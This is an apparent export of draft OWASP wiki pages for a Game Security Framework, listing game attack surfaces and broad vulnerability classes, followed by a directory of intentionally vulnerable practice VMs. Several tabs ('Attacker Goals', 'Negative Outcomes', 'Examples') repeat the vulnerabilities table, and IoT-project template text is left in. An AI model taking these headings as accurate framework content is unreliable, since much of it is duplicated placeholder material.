* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==
* Coming Soon

== News and Events ==
* Coming Soon

|}

= Game Vulnerabilities =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Jason Haddix

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Attacker Goals =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Negative Outcomes =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Examples =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Jason Haddix

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Community =

[https://www.iamthecavalry.org/ I Am The Cavalry]

A global grassroots organization that is focused on issues where computer security intersects public safety and human life.

Their areas of focus include:
* Medical devices
* Automobiles
* Home Electronics
* Public Infrastructure
== ==
[http://builditsecure.ly BuildItSecure.ly]

A project focused on helping small business connect with security researchers to aid in securing their IoT-based products before going market.

Their goals include:
* Focus effort towards small business
* Build partnerships
* Coordinate efforts
* Curate informational resources
* Present research
== ==
[https://otalliance.org Online Trust Alliance]

Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.

Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.
== ==
[https://allseenalliance.org/framework AllSeen Alliance]

The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.
== ==
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]

The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.
== ==
[http://securingsmartcities.org/ Securing Smart Cities]

Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.

===Talks===

RSA Conference San Francisco <br>
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br>
Daniel Miessler, Practice Principal <br>
April 21, 2015 <br>
--- <br>
Defcon 23 <br>
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br>
Daniel Miessler <br>
August 6-9, 2015

===Podcasts===

* [http://iotpodcast.com/ The Internet of Things Podcast]
* [http://www.iot-inc.com/ IoT Inc]
* [https://craigsmith.net/category/podcast/ IoT This Week]
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]

===IoT Conferences===

* [http://www.iotevents.org Internet of Things Events]

Conference Call for Papers
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]
|}

= Testing Tools =

== Commonly Used Game Hacking Tools ==

== ==
{{Social Media Links}}

=Project About=

{{Template:Project About
| project_name =OWASP Internet of Things Project
| project_description =
| project_license =CC-BY 3.0 for documentation and GPLv3 for code.
| leader_name1 = Daniel Miessler
| leader_email1 =
| leader_username1 =
| leader_name2 =Craig Smith
| leader_email2 =
| leader_username2 =
| contributor_name1 = Justin Klein Keane]
| contributor_email1 =
| contributor_username1 = Justin_C._Klein_Keane
| contributor_name2 = Yunsoul
| contributor_email2 =
| contributor_username2 = Yunsoul
| mailing_list_name =
| links_url1 =
| links_name1 =
| links_url1 =
| links_name1 =
}}

__NOTOC__ <headertabs />

[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]]

OWASP Game Security Framework Project

2017-01-18T00:46:32Z

Jason Haddix:

= About the Project =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Game Security Framework (GSF)==

'''The OWASP Game Security Framework (GSF) represents a modular approach to understanding the security issues that surround video game ecosystems.'''

''The framework is broken into three main concepts / sections:''

'''1. Identifying and clustering the components of risk within the overall game security space, and then giving instances of each component.'''

''Components include the following:''

* '''Attack Surfaces''': the various surface areas that can be attacked by attackers in order to cause harm to the gaming ecosystem.

* '''Vulnerabilities''': the specific weaknesses in design or implementation that allows attackers to successfully target a given game.

* '''Attacker Goals''': a list of the reasons that an attacker might want to attack a given game.

* '''Negative Outcomes''': a collection of ways that the gaming company could ultimately be impacted negatively by attacks to its game and associated infrastructure.

'''2. A natural language semantic structure for thinking about and articulating game security issues, which uses the modular risk components as sentence structure.'''

''Example:''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating.”

Using this structure, security testers can clearly communicate the various aspects of a game security issue to many different types of stakeholder—from pentesting peers to business executives in the gaming industry.

'''3. Examples of real-world examples of previous attacks against games, and how the attacks map to the GSF framework components.'''

==Licensing==
The OWASP Game Security Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the OWASP Game Security Framework? ==

The goal of the OWASP Game Security Framework is to provide a structure for discussing the various aspects around the security of video games.

The target audience for the project includes:

* Gamers
* Game designers
* Penetration testers
* Gaming executives
* Anyone else with a vested interest in game security

== Project Leaders ==

* Jason Haddix
* Daniel Miessler

== Contributors ==
* LFG

== Related Projects ==

* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]

| valign="top" style="padding-left:25px;width:200px;" |

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==

COMING SOON

== News and Events ==
* ''[JANUARY 2017]'' Doing a complete redesign of the project.

==Classifications==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]
|}

|}

= Game Attack Surfaces =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Attack Surfaces ==

The following is a list of the attack surfaces that can be found in video games of various types.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* The locally running game client that is accessible to the gamer because it's running on his/her machine.
|-
| '''Game Network Traffic'''
|
* The network which game traffic traverses in order to reach the game's server or peers who are playing the game.
|-
| '''Game Server'''
|
* The game server that is hosting the instance that gamers connect to in order to play the game.
|-
| '''Game Economy'''
|
* The economic system that exists within the game.
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Attack Surfaces Section? ==

This section provides an overview of the various places an attacker can target to harm a given game infrastructure.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==
* Coming Soon

== News and Events ==
* Coming Soon

|}

= Game Vulnerabilities =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Jason Haddix

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Attacker Goals =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Negative Outcomes =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Examples =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Jason Haddix

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Community =

[https://www.iamthecavalry.org/ I Am The Cavalry]

A global grassroots organization that is focused on issues where computer security intersects public safety and human life.

Their areas of focus include:
* Medical devices
* Automobiles
* Home Electronics
* Public Infrastructure
== ==
[http://builditsecure.ly BuildItSecure.ly]

A project focused on helping small business connect with security researchers to aid in securing their IoT-based products before going market.

Their goals include:
* Focus effort towards small business
* Build partnerships
* Coordinate efforts
* Curate informational resources
* Present research
== ==
[https://otalliance.org Online Trust Alliance]

Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.

Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.
== ==
[https://allseenalliance.org/framework AllSeen Alliance]

The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.
== ==
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]

The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.
== ==
[http://securingsmartcities.org/ Securing Smart Cities]

Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.

===Talks===

RSA Conference San Francisco <br>
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br>
Daniel Miessler, Practice Principal <br>
April 21, 2015 <br>
--- <br>
Defcon 23 <br>
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br>
Daniel Miessler <br>
August 6-9, 2015

===Podcasts===

* [http://iotpodcast.com/ The Internet of Things Podcast]
* [http://www.iot-inc.com/ IoT Inc]
* [https://craigsmith.net/category/podcast/ IoT This Week]
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]

===IoT Conferences===

* [http://www.iotevents.org Internet of Things Events]

Conference Call for Papers
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]
|}

= Testing Tools =

TABLE HERE

== ==
{{Social Media Links}}

=Project About=

{{Template:Project About
| project_name =OWASP Internet of Things Project
| project_description =
| project_license =CC-BY 3.0 for documentation and GPLv3 for code.
| leader_name1 = Daniel Miessler
| leader_email1 =
| leader_username1 =
| leader_name2 =Craig Smith
| leader_email2 =
| leader_username2 =
| contributor_name1 = Justin Klein Keane]
| contributor_email1 =
| contributor_username1 = Justin_C._Klein_Keane
| contributor_name2 = Yunsoul
| contributor_email2 =
| contributor_username2 = Yunsoul
| mailing_list_name =
| links_url1 =
| links_name1 =
| links_url1 =
| links_name1 =
}}

__NOTOC__ <headertabs />

[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]]

OWASP Vulnerable Web Applications Directory Project/Pages/VMs

2016-12-11T06:55:53Z

Jason Haddix:

{| border="1" width="80%" cellspacing="0" cellpadding="2"
|-
! scope="col" | App Name / Link
! scope="col" | Technology
! scope="col" | Other links
! scope="col" | Author
! scope="col" | Notes
|-
| [http://www.badstore.net/ BadStore ]
| ISO
| [http://www.badstore.net/register.htm download]
|
|
|-
| [http://sourceforge.net/projects/bwapp/files/bee-box/ Bee-Box ]
| bWAPP VMware
|
|
|
|-
| [http://code.google.com/p/owaspbwa/wiki/ProjectSummary Broken Web Applications Project (BWA) ]
| VMware
| [http://code.google.com/p/owaspbwa/wiki/Downloads download]
| OWASP
|
|-
| [https://bechtsoudis.com/work-stuff/challenges/drunk-admin-web-hacking-challenge/ Drunk Admin Web Hacking Challenge ]
| VMware
| [http://bechtsoudis.com/data/challenges/drunk_admin_hacking_challenge.zip download]
|
|
|-
| [http://exploit.co.il/projects/vuln-web-app/ Exploit.co.il Vuln Web App ]
| VMware
| [http://sourceforge.net/projects/exploitcoilvuln/files/ download]
|
|
|-
| [http://sourceforge.net/projects/null-gameover/ GameOver ]
| VMware
| [http://sourceforge.net/projects/null-gameover/files/ download]
|
|
|-
| [http://hackxor.sourceforge.net/cgi-bin/index.pl Hackxor ]
| VMware
| [http://sourceforge.net/projects/hackxor/files/ download] [http://hackxor.sourceforge.net/cgi-bin/hints.pl hints&tips]
|
|
|-
| [http://ninja-sec.com/index.php/hacme-bank-prebuilt-vmware-image-ninja-sec-com/ Hacme Bank Prebuilt VM ]
| VMware
| [http://dc121.4shared.com/download/wwPhUxMQ/hackme_bank_vm_Ninja-Sec.zip download]
|
|
|-
| [http://www.kioptrix.com/blog/?p=604 Kioptrix4 ]
| VMware & Hyper-V
| [http://www.kioptrix.com/dlvm/Kioptrix4_vmware.rar download]
|
|
|-
| [http://sourceforge.net/projects/lampsecurity/ LAMPSecurity ]
| VMware
| [http://sourceforge.net/projects/lampsecurity/files/ download] [http://sourceforge.net/projects/lampsecurity/files/Documentation/ doc]
|
|
|-
| [https://community.rapid7.com/docs/DOC-1875 Metasploitable 2 ]
| VMware
| [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/ download]
|
|
|-
| [https://github.com/rapid7/metasploitable3/wiki/Vulnerabilities Metasploitable 3 ]
| VMware
| [https://github.com/rapid7/metasploitable3 download]
|
|
|-
| [http://www.bonsai-sec.com/en/research/moth.php Moth ]
| VMware
| [http://sourceforge.net/projects/w3af/files/moth/moth/ download]
|
|
|-
| [https://www.pentesterlab.com/exercises/ PentesterLab - The Exercises ]
| ISO & PDF
|
|
|
|-
| [http://phdays.blogspot.com.es/2012/05/once-again-about-remote-banking.html PHDays I-Bank ]
| VMware
| [http://downloads.phdays.com/phdays_ibank_vm.zip download]
|
|
|-
| [http://www.samurai-wtf.org/ Samurai WTF ]
| ISO - list
| [http://sourceforge.net/projects/samurai/files/ download]
|
|
|-
